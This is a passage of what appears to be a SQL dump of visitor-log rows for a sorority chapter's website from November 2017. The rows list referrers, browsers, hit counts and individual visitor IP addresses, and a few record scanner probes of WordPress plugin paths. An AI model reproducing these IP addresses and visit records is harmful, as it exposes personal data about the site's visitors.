zc2R3NpSTlOYTE1Zmp5UnM3UE9WeG1EWWVtWlI1WnBoMGQ3ak1HZw&b64e=2&sign=6419703d9a2076f6ae234ccc941211cb&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi6W0psRJro0MEUiyfppuG3rYUsOVb2eWBbFnW4N3tDYn8UlqYBGJjgHF7WHN_SxBCZDoy1Apy4Qmqq0xPj1ovzfOhpKgQ3tNilLPvWIdg0C4VPHDnJVYv3w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0yuKjrqCzxFUwfq7QzeouYPcpDIp3RUBBcYxM3bheQ7FKHcjMfKGJFcaiLTSawVyWNg&l10n=ru&cts=1510301631510&mc=7.47143826428','MSIE','Windows','10.0','','188.32.242.78','000',1,0),(13903,'2017-11-10','https://www.google.com/','Safari','iPhone','10.0','','98.204.18.165','000',4,0),(13904,'2017-11-10','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.212.72.247','000',2,0),(13905,'2017-11-10','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',1,0),(13906,'2017-11-10','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',1,0),(13907,'2017-11-10','https://zphiblgz.org','Chrome','Chrome OS','61.0.3163.123','','69.143.35.179','000',2,0),(13908,'2017-11-10','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(13909,'2017-11-10','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.218.101.27','000',2,0),(13910,'2017-11-10','https://zphiblgz.org','Firefox','Windows','40.1','','86.1.177.147','000',3,0),(13911,'2017-11-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','50.254.222.166','000',2,0),(13912,'2017-11-10','https://zphiblgz.org','Firefox','Windows','34.0','','176.213.16.29','000',1,0),(13913,'2017-11-10','https://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',5,0),(13914,'2017-11-10','https://zphiblgz.org','Firefox','Windows','40.1','','201.214.95.91','000',3,0),(13915,'2017-11-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(13916,'2017-11-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(13917,'2017-11-10','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.68','000',1,0),(13918,'2017-11-10','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13919,'2017-11-10','http://www.zphiblgz.org/','Firefox','Linux','45.0','','146.185.223.25','000',4,0),(13920,'2017-11-10','https://zphiblgz.org/','Opera','Windows','12.17','','146.185.223.25','000',4,0),(13921,'2017-11-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(13922,'2017-11-10','https://zphiblgz.org','Opera Next','Windows','20.0.1387.82','','144.76.80.151','000',2,0),(13923,'2017-11-10','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','173.13.219.222','000',1,0),(13924,'2017-11-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.62','000',1,0),(13925,'2017-11-10','http://zphiblgz.org/','Firefox','Windows','52.0','','198.52.35.46','000',1,0),(13926,'2017-11-10','https://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','5.35.16.67','000',1,0),(13927,'2017-11-10','https://zphiblgz.org','Firefox','Windows','40.1','','187.207.102.202','000',3,0),(13928,'2017-11-10','https://zphiblgz.org/','Safari','iPhone','7.0','','157.55.2.178','000',1,0),(13929,'2017-11-10','https://zphiblgz.org','Safari','iPod','5.0.2','','171.25.193.25','000',38,0),(13930,'2017-11-10','http://site.ru','Chrome','Windows','5.0.375.99','','108.167.137.6','000',1,0),(13931,'2017-11-10','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','70.12.251.212','000',2,0),(13932,'2017-11-10','http://site.ru','Chrome','Windows','5.0.375.99','','74.220.203.54','000',1,0),(13933,'2017-11-10','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.233.129.216','000',2,0),(13934,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(13935,'2017-11-11','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','54.36.98.167','000',2,0),(13936,'2017-11-11','http://site.ru','Chrome','Windows','5.0.375.99','','91.134.248.253','000',1,0),(13937,'2017-11-11','https://zphiblgz.org','Firefox','Windows','40.1','','49.149.33.24','000',3,0),(13938,'2017-11-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(13939,'2017-11-11','http://site.ru','Chrome','Windows','5.0.375.99','','31.3.16.59','000',2,0),(13940,'2017-11-11','https://www.google.com/','Chrome','Android','62.0.3202.84','','99.203.16.55','000',3,0),(13941,'2017-11-11','http://www.bing.com/search?q=history+of+Gamma+Chapter+of+Zeta+Phi+Beta%2C+Morgann+State&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(13942,'2017-11-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.126','000',1,0),(13943,'2017-11-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.116.77','000',13,0),(13944,'2017-11-11','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.116.77','000',1,0),(13945,'2017-11-11','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.100.43','000',1,0),(13946,'2017-11-11','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','136.243.28.23','000',1,0),(13947,'2017-11-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(13948,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','131.118.228.48','000',2,0),(13949,'2017-11-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.63','000',1,0),(13950,'2017-11-11','http://site.ru','Chrome','Windows','5.0.375.99','','70.35.198.245','000',1,0),(13951,'2017-11-11','https://zphiblgz.org','Firefox','Linux','21.0','','136.243.17.161','000',1,0),(13952,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','166.216.165.110','000',1,0),(13953,'2017-11-11','https://www.google.com/','Chrome','Windows','61.0.3163.100','','142.147.59.153','000',3,0),(13954,'2017-11-11','https://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',2,0),(13955,'2017-11-11','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',7,0),(13956,'2017-11-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(13957,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','68.134.0.6','000',2,0),(13958,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.244.254.236','000',2,0),(13959,'2017-11-11','https://zphiblgz.org','Firefox','Windows','34.0','','77.222.113.202','000',1,0),(13960,'2017-11-11','https://zphiblgz.org','Firefox','Windows','56.0','','73.213.34.34','000',4,0),(13961,'2017-11-11','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','66.240.236.119','000',1,0),(13962,'2017-11-11','https://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.167.29.106','000',15,0),(13963,'2017-11-11','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','144.217.80.113','000',2,0),(13964,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','166.216.165.65','000',2,0),(13965,'2017-11-11','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','68.134.16.217','000',4,0),(13966,'2017-11-11','https://www.google.com/','Chrome','Windows','62.0.3202.89','','76.21.248.212','000',7,0),(13967,'2017-11-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.123','000',1,0),(13968,'2017-11-12','http://zphiblgz.org/','MSIE','Windows','6.0','','116.103.148.89','000',1,0),(13969,'2017-11-12','https://zphiblgz.org','MSIE','Unknown','8.0','','144.217.68.229','000',2,0),(13970,'2017-11-12','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13971,'2017-11-12','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.195','000',1,0),(13972,'2017-11-12','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(13973,'2017-11-12','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.48.66.89','000',3,0),(13974,'2017-11-12','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',1,0),(13975,'2017-11-12','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(13976,'2017-11-12','https://zphiblgz.org','Safari','Macintosh','5.0.2','','144.76.71.83','000',1,0),(13977,'2017-11-12','https://zphiblgz.org','Firefox','Windows','21.0','','5.9.106.81','000',1,0),(13978,'2017-11-12','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.48.66.92','000',1,0),(13979,'2017-11-12','https://zphiblgz.org','Firefox','Windows','40.1','','139.47.15.208','000',3,0),(13980,'2017-11-12','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','164.132.107.90','000',2,0),(13981,'2017-11-12','https://www.google.com/','Safari','iPad','11.0','','98.233.117.180','000',4,0),(13982,'2017-11-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',6,0),(13983,'2017-11-12','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.60.128.101','000',2,0),(13984,'2017-11-12','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.88','000',1,0),(13985,'2017-11-12','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','176.8.91.190','000',3,0),(13986,'2017-11-12','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','100.15.51.26','000',2,0),(13987,'2017-11-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.60.47','000',2,0),(13988,'2017-11-12','https://zphiblgz.org','Chrome','Windows','23.0.1271.64','','178.156.202.178','000',5,0),(13989,'2017-11-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.163','000',1,0),(13990,'2017-11-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.170','000',1,0),(13991,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','185.17.41.25','000',2,0),(13992,'2017-11-13','https://zphiblgz.org','Firefox','Windows','34.0','','195.98.69.140','000',1,0),(13993,'2017-11-13','https://zphiblgz.org/','AppleWebKit','Windows','534','','199.30.25.13','000',1,0),(13994,'2017-11-13','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',2,0),(13995,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','178.250.240.53','000',1,0),(13996,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','94.228.205.30','000',2,0),(13997,'2017-11-13','zphiblgz.org','Chrome','Windows','50.0.13.75','','103.7.41.211','000',1,0),(13998,'2017-11-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(13999,'2017-11-13','https://www.google.com/','Chrome','Windows','61.0.3163.100','','134.192.250.79','000',6,0),(14000,'2017-11-13','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2F&e=ATMphc5Mw_ZMRy-AdmJnDKvfYHD-M8wswqjw7BraJIt224uwWlKns7MSKzW3LV8S_5X_VJyFOUx96tBd6QK4mF3C0yOCB-k','AppleWebKit','iPhone','604.3.5','','73.134.249.95','000',2,0),(14001,'2017-11-13','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',4,0),(14002,'2017-11-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.15','000',1,0),(14003,'2017-11-13','https://zphiblgz.org','Firefox','Windows','1.0.7','','35.160.139.97','000',1,0),(14004,'2017-11-13','https://zphiblgz.org','Chrome','Windows','62.0.3202.75','','214.36.6.24','000',5,0),(14005,'2017-11-13','https://buff.ly/2zSqLRf','Unknown','Unknown','Unknown','','54.161.46.211','000',4,0),(14006,'2017-11-13','https://zphiblgz.org','MetaURI','Unknown','Unknown','','94.130.11.17','000',1,0),(14007,'2017-11-13','https://zphiblgz.org','MSIE','Windows','10.0','','23.96.179.202','000',1,0),(14008,'2017-11-13','https://buff.ly/2zUzse3','Firefox','Linux','3.6.10','','144.76.23.48','000',1,0),(14009,'2017-11-13','http://m.facebook.com','Safari','iPhone','11.0','','31.13.114.150','000',1,0),(14010,'2017-11-13','https://zphiblgz.org/event/nuts-bolts-understanding-college-financial-aid/','Safari','iPhone','11.0','','31.13.114.147','000',1,0),(14011,'2017-11-13','https://buff.ly/2AHdEzR','Unknown','Unknown','Unknown','','54.147.162.252','000',2,0),(14012,'2017-11-13','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','67.5.146.244','000',1,0),(14013,'2017-11-13','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','99.203.16.253','000',1,0),(14014,'2017-11-13','https://zphiblgz.org','Safari','iPhone','10.0','','174.204.9.131','000',1,0),(14015,'2017-11-13','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','69.250.182.195','000',2,0),(14016,'2017-11-13','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','50.232.32.201','000',2,0),(14017,'2017-11-13','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','184.169.45.4','000',1,0),(14018,'2017-11-13','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','50.225.39.87','000',10,0),(14019,'2017-11-13','https://zphiblgz.org','Firefox','Windows','56.0','','138.238.231.110','000',2,0),(14020,'2017-11-13','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','217.182.72.197','000',2,0),(14021,'2017-11-13','https://zphiblgz.org','python-requests','Unknown','2.18.3','','175.42.44.95','000',2,0),(14022,'2017-11-13','https://zphiblgz.org','Chrome','Macintosh','35.0.1916.153','','175.42.44.95','000',1,0),(14023,'2017-11-13','https://zphiblgz.org','Firefox','Windows','30.0','','175.42.44.95','000',1,0),(14024,'2017-11-13','https://zphiblgz.org','Firefox','Windows','31.0','','175.42.44.95','000',2,0),(14025,'2017-11-13','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','175.42.44.95','000',1,0),(14026,'2017-11-13','http://www.zphiblgz.org','Firefox','Windows','41.0','','175.42.44.95','000',102,0),(14027,'2017-11-13','https://zphiblgz.org','Chrome','Macintosh','36.0.1985.125','','175.42.44.95','000',1,0),(14028,'2017-11-13','https://zphiblgz.org','Firefox','Windows','24.0','','175.42.44.95','000',1,0),(14029,'2017-11-13','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.60.128.121','000',2,0),(14030,'2017-11-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(14031,'2017-11-13','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.254','000',1,0),(14032,'2017-11-13','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14033,'2017-11-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.70','000',1,0),(14034,'2017-11-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.74','000',1,0),(14035,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.14','000',2,0),(14036,'2017-11-13','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.48.66.90','000',2,0),(14037,'2017-11-13','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(14038,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','74.220.215.203','000',2,0),(14039,'2017-11-13','http://site.ru','Chrome','Windows','5.0.375.99','','188.116.19.93','000',1,0),(14040,'2017-11-13','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(14041,'2017-11-13','http://zphiblgz.org/','MSIE','Windows','11.0','','169.50.62.93','000',1,0),(14042,'2017-11-13','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.48.66.82','000',1,0),(14043,'2017-11-13','https://zphiblgz.org','Chrome','Macintosh','42.0.2320.75','','107.173.85.112','000',2,0),(14044,'2017-11-14','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(14045,'2017-11-14','http://zphiblgz.org/','MSIE','Windows','6.0','','118.91.171.90','000',2,0),(14046,'2017-11-14','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14047,'2017-11-14','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.29','000',1,0),(14048,'2017-11-14','https://zphiblgz.org','Firefox','Windows','34.0','','5.143.219.4','000',1,0),(14049,'2017-11-14','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','145.239.89.247','000',2,0),(14050,'2017-11-14','http://www.zphibmaryland.org/chapters/','Chrome','Android','62.0.3202.84','','66.249.88.18','000',1,0),(14051,'2017-11-14','http://www.zphibmaryland.org/chapters/','Chrome','Android','62.0.3202.84','','68.133.2.143','000',3,0),(14052,'2017-11-14','zphiblgz.org','Chrome','Windows','47.0.1335.75','','89.36.211.128','000',1,0),(14053,'2017-11-14','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(14054,'2017-11-14','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',3,0),(14055,'2017-11-14','https://www.google.com/','Chrome','Windows','62.0.3202.89','','205.222.248.62','000',4,0),(14056,'2017-11-14','https://zphiblgz.org','MSIE','Windows','9.0','','86.110.116.119','000',2,0),(14057,'2017-11-14','https://zphiblgz.org','Chrome','Linux','56.0.2974.60','','86.110.116.119','000',2,0),(14058,'2017-11-14','https://zphiblgz.org','Firefox','Windows','40.1','','79.101.211.78','000',3,0),(14059,'2017-11-14','https://www.google.com/','Safari','iPhone','11.0','','71.218.85.229','000',5,0),(14060,'2017-11-14','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(14061,'2017-11-14','https://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.22','000',5,0),(14062,'2017-11-14','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.4','000',1,0),(14063,'2017-11-14','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.10','000',1,0),(14064,'2017-11-14','https://zphiblgz.org/','Chrome','Linux','41.0.2272.118','','66.249.80.12','000',1,0),(14065,'2017-11-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(14066,'2017-11-14','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','100.18.10.93','000',1,0),(14067,'2017-11-14','http://zphiblgz.org/','Chrome','Linux','58.0.3029.110','','146.185.223.25','000',2,0),(14068,'2017-11-14','https://zphiblgz.org/','Opera','Windows','12.17','','146.185.223.25','000',4,0),(14069,'2017-11-14','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.20','000',1,0),(14070,'2017-11-14','https://zphiblgz.org','Chrome','Windows','50.0.2661.94','','192.187.101.170','000',2,0),(14071,'2017-11-14','https://zphiblgz.org','MSIE','Windows','6.0','','191.96.249.110','000',1,0),(14072,'2017-11-14','https://zphiblgz.org','MSIE','Windows','6.0','','107.170.107.176','000',1,0),(14073,'2017-11-14','https://zphiblgz.org','Firefox','Windows','4.0','','107.170.107.176','000',1,0),(14074,'2017-11-14','https://zphiblgz.org','Firefox','Linux','4.0','','107.170.107.176','000',1,0),(14075,'2017-11-14','https://www.google.com/','Chrome','Macintosh','61.0.3163.100','','73.7.144.110','000',2,0),(14076,'2017-11-14','https://zphiblgz.org','PiplBot','Unknown','Unknown','','169.48.66.82','000',1,0),(14077,'2017-11-15','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.254','000',1,0),(14078,'2017-11-15','https://zphiblgz.org','Safari','iPhone','6.0','','218.30.103.163','000',2,0),(14079,'2017-11-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.18','000',1,0),(14080,'2017-11-15','https://zphiblgz.org','Firefox','Windows','34.0','','185.126.180.204','000',1,0),(14081,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.179','000',2,0),(14082,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.249','000',2,0),(14083,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.47','000',2,0),(14084,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.76.78.228','000',2,0),(14085,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.76.78.154','000',2,0),(14086,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.170','000',1,0),(14087,'2017-11-15','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.51','000',2,0),(14088,'2017-11-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.248.220.183','000',2,0),(14089,'2017-11-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','64.110.132.107','000',1,0),(14090,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','101.248.182.31','000',1,0),(14091,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','58.248.205.207','000',1,0),(14092,'2017-11-15','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.5','000',1,0),(14093,'2017-11-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.12','000',1,0),(14094,'2017-11-15','https://zphiblgz.org','Firefox','Windows','40.1','','109.98.201.143','000',3,0),(14095,'2017-11-15','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','178.159.37.105','000',3,0),(14096,'2017-11-15','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiFqu_L3sDXAhUE02MKHVQZBPsQFggoMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','153.31.113.20','000',8,0),(14097,'2017-11-15','https://zphiblgz.org','Safari','Windows','537.36','','213.133.166.10','000',2,0),(14098,'2017-11-15','https://www.google.com/','Chrome','Android','56.0.2924.87','','172.58.3.176','000',2,0),(14099,'2017-11-15','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','162.99.255.216','000',2,0),(14100,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','58.21.100.79','000',1,0),(14101,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','106.45.0.151','000',1,0),(14102,'2017-11-15','http://zphiblgz.org/wp-content/plugins/revslider/temp/','Chrome','Windows','42.0.2311.152','','209.90.225.243','000',1,0),(14103,'2017-11-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',6,0),(14104,'2017-11-15','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.58.185.208','000',2,0),(14105,'2017-11-15','https://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','71.244.252.172','000',13,0),(14106,'2017-11-15','https://zphiblgz.org','Firefox','Windows','40.1','','66.177.66.59','000',2,0),(14107,'2017-11-15','http://zphiblgz.org/','Firefox','Windows','52.0','','31.28.214.110','000',2,0),(14108,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','171.120.151.253','000',1,0),(14109,'2017-11-15','https://zphiblgz.org','Safari','iPhone','9.0','','36.32.15.87','000',1,0),(14110,'2017-11-15','https://zphiblgz.org','MSIE','Windows','6.0','','179.159.44.37','000',2,0),(14111,'2017-11-16','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14112,'2017-11-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.108','000',2,0),(14113,'2017-11-16','https://zphiblgz.org','Firefox','Windows','34.0','','188.162.229.237','000',1,0),(14114,'2017-11-16','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(14115,'2017-11-16','http://zphiblgz.org/','Firefox','Windows','54.0','','198.52.230.253','000',1,0),(14116,'2017-11-16','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',1,0),(14117,'2017-11-16','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(14118,'2017-11-16','http://zphiblgz.org/wp-content/plugins/download-manager/assets/bootstrap/js/bootstrap.min.js?ver=4.7.6','Lynx','Unknown','2.8.5rel.1','','78.158.11.226','000',1,0),(14119,'2017-11-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.56','000',1,0),(14120,'2017-11-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.57','000',1,0),(14121,'2017-11-16','http://www.bing.com/search?q=lamda%20zeta%20chapter%20of%20zeta%20phi%20beta%20sorority%20inc&qs=n&form=QBRE&sp=-1&pq=undefined&sc=0-37&sk=&cvid=497A6D09DEC74E67B289403D451B7DA9','MSIE','Windows','11.0','','69.67.87.114','000',3,0),(14122,'2017-11-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.12','000',1,0),(14123,'2017-11-16','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.206','000',1,0),(14124,'2017-11-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(14125,'2017-11-16','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwj0sJTz_MPXAhWG2yYKHTiFCugQjRwIBw&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw1bx7kMcgl9jEouR9vquuws&ust=1510951928548884','MSIE','Windows','11.0','','208.87.72.31','000',3,0),(14126,'2017-11-16','https://zphiblgz.org','Safari','Macintosh','10.1.2','','165.230.225.21','000',2,0),(14127,'2017-11-16','https://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.227.88.163','000',2,0),(14128,'2017-11-16','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','173.69.157.50','000',12,0),(14129,'2017-11-16','http://zphiblgz.org','Firefox','Windows','52.0','','195.154.32.255','000',2,0),(14130,'2017-11-16','https://zphiblgz.org/','Opera','Windows','12.17','','107.175.136.26','000',4,0),(14131,'2017-11-16','https://zphiblgz.org/','PHP','Unknown','6.2.59','','107.175.136.26','000',1,0),(14132,'2017-11-17','https://zphiblgz.org','Firefox','Windows','40.1','','161.31.8.30','000',2,0),(14133,'2017-11-17','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.139.253','000',2,0),(14134,'2017-11-17','https://zphiblgz.org','Firefox','Windows','52.0','','8.44.100.11','000',3,0),(14135,'2017-11-17','http://www.zphiblgz.org/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','Chrome','Windows','42.0.2311.152','','209.90.225.243','000',3,0),(14136,'2017-11-17','https://zphiblgz.org','Chrome','Linux','47.0.2526.35','','212.129.61.56','000',2,0),(14137,'2017-11-17','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',2,0),(14138,'2017-11-17','zphiblgz.org','Chrome','Windows','47.0.1335.75','','114.207.113.80','000',1,0),(14139,'2017-11-17','https://zphiblgz.org','Safari','iPhone','10.0','','174.205.11.57','000',3,0),(14140,'2017-11-17','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','144.76.153.198','000',1,0),(14141,'2017-11-17','https://zphiblgz.org','python-requests','Unknown','2.18.3','','175.42.44.95','000',2,0),(14142,'2017-11-17','https://zphiblgz.org','Firefox','Linux','31.0','','175.42.44.95','000',1,0),(14143,'2017-11-17','https://zphiblgz.org','Chrome','Macintosh','35.0.1916.153','','175.42.44.95','000',1,0),(14144,'2017-11-17','https://zphiblgz.org','Chrome','Macintosh','36.0.1985.125','','175.42.44.95','000',2,0),(14145,'2017-11-17','https://zphiblgz.org','Chrome','Linux','34.0.1847.116','','175.42.44.95','000',1,0),(14146,'2017-11-17','https://zphiblgz.org','MSIE','Windows','11.0','','175.42.44.95','000',1,0),(14147,'2017-11-17','http://www.zphiblgz.org','Firefox','Windows','41.0','','175.42.44.95','000',88,0),(14148,'2017-11-17','https://zphiblgz.org','Firefox','Windows','30.0','','175.42.44.95','000',1,0),(14149,'2017-11-17','https://zphiblgz.org','Firefox','Windows','57.0','','51.254.97.56','000',2,0),(14150,'2017-11-17','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2F%3Fauthor%3D1','Chrome','Windows','7.0.517.44','','195.242.80.92','000',1,0),(14151,'2017-11-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','50.225.39.75','000',5,0),(14152,'2017-11-17','https://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.81.192','000',3,0),(14153,'2017-11-17','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14154,'2017-11-17','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.103','000',1,0),(14155,'2017-11-17','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.212','000',1,0),(14156,'2017-11-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(14157,'2017-11-17','https://www.google.com/','Edge','Windows','15.15063','','45.36.232.34','000',2,0),(14158,'2017-11-17','https://www.google.com/','Safari','iPhone','11.0','','166.216.159.73','000',2,0),(14159,'2017-11-17','https://zphib